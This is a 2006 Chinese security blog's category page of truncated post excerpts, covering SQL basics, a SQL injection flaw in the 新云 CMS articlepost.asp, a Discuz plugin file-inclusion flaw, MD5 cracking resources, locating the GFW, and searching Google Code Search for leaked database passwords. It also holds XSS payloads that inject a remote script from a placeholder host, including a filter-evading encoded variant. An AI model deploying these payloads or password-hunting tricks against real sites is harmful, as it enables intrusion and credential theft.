分类 ‘技术文章’ 下的日志

经典SQL语句集锦

2006/10/18 4:32 | 鬼仔 | 技术文章 | 消灭0回复

下列语句部分是MsSql语句,不可以在access中使用。

SQL分类:
DDL—数据定义语言(CREATE,ALTER,DROP,DECLARE)
DML—数据操纵语言(SELECT,DELETE,UPDATE,INSERT)
DCL—数据控制语言(GRANT,REVOKE,COMMIT,ROLLBACK)

首先,简要介绍基础语句:
1、说明:创建数据库
CREATE DATABASE database-name
2、说明:删除数据库
drop database dbname
3、说明:备份sql server
— 创建 备份数据的 device
USE master
EXEC sp_addumpdevice 'disk', 'testBack', 'c:\mssql7backup\MyNwind_1.dat'
— 开始 备份
BACKUP DATABASE pubs TO testBack
阅读全文 »

Tags:

新云网站管理系统articlepost.asp文件注入漏洞

2006/10/17 9:47 | 鬼仔 | 技术文章 | 消灭0回复

来自:守护天使's blog

user\articlepost.asp文件第333行。
代码如下
SQL = "select ArticleID,title,content,ColorMode,FontMode,Author,ComeFrom,WriteTime,username from NC_Article where ChannelID=" & ChannelID & " And username='" & Newasp.MemberName & "' And ArticleID=" & Request("ArticleID")
Request("ArticleID")直接就放到查询语句里面了。
看上下的代码,没有任何过滤。只有用户是否有权限发文章的检查。
OK,然后就综合上下文的代码,可以构造语句。
articlepost.asp?ChannelID=1&action=view& 阅读全文 »

Tags: , ,

discuz许愿池插件远程包含漏洞

2006/10/16 5:31 | 鬼仔 | 技术文章 | 消灭0回复

昨天从Cnfjhh那里得到消息的。
今天看到有人公布了,火狐那里也发布利用工具了,我就也发出来。
许愿池插件的wish.php文件出的问题:
阅读全文 »

Tags:

What to do with an MD5 Hash?

2006/10/12 4:25 | 鬼仔 | 技术文章 | 消灭0回复

国外一站上看到的。

Author:Holz
From: http://www.overclock.ch/forum/viewtopic.php?t=46

Let’s use 7cf2db5ec261a0fa27a502d3196a6f60 (= pizza) as example MD5 hash.

1. KOP’s Database on IRC (Rizon)

Simply connect to Rizon (irc.rizon.net) and join #md5 / #md5crack with your IRC client.

[%MD5crackbot]

阅读全文 »

Tags:

在XSS中如何再插JS

2006/10/10 12:56 | 鬼仔 | 技术文章 | 1 个回复

信息来源:s0n9'5 B1o9

<img src="javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}"></img>

字符过滤怎么办?用Encode加密后就无敌了~

未加密前:
<img src='#' XSS="try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}" onerror="execScript(decodeURI(this.XSS),'Jscript.Encode');" >
阅读全文 »

Tags: ,

找出GFW在Internet的位置

2006/10/09 10:29 | 鬼仔 | 技术文章 | 消灭0回复

作者:刘宏光
邮件:iceblood_at_163.com
网址:http://www.nettf.net
日期:2006-9-26

看到这篇文章的标题,可能有人要问GFW到底是什么?虽然GFW在一部分人的眼睛里并不陌生了,但相对与大部分人来说还是非常陌生的,引用我在google里找到的一段话:
The Great Fire Wall of China的简写,意指“中国网络防火墙”(字面意为“中国防火长城”),这是对“国家公共网络监控系统”的俗称,国内简称“防火长城”。
GFW 是“金盾工程”的一个子功能。“金盾工程”是以公安信息网络为先导,以各项公安工作信息化为主要内容,建立统一指挥、快速反应、协同作战机制,在全国范围内开展公安信息化的工程,主要包括建设公安综合业务通信网、公安综合信息系统、全国公安指挥调度系统以及全国公共网络监控中心等。该项目2003年开始生效。一般所说的GFW,主要 阅读全文 »

Tags:

利用Google Code Search找出数据库密码

2006/10/08 2:13 | 鬼仔 | 技术文章 | 消灭0回复


Google前天推出了 代码搜索工具
在Digg上有人已经发了 Finding Passwords with Google
文章开头的图是搜索WordPress的数据库资料,包括用户名和密码的例子:
http://google.com/codesearch?hl=en&lr=&q=lang%3Aphp+file% 阅读全文 »

Tags:

奇炫的JavaScript代码(可直接在浏览器地址栏运行)

2006/10/08 2:09 | 鬼仔 | 技术文章 | 1 个回复

信息来源:GSeeker

大图:http://huaidan.org/wp-content/uploads/img/yupoo/20061008/141052_1122768861_jdpnbeud.jpg

上面是我blog的留言簿页,但上面的图片都绕成圈在旋转了。这并不需要什么复杂的方法,只需要直接在浏览器的地址栏里输入一段简单的JavaScript代码即可实现。光是说可能表达不出来效果,下面是由网友制作的视频,是Google图片搜索关于"blog"的结果页,输入那段JavaScript代码后的效果(via Digg):
阅读全文 »

Tags: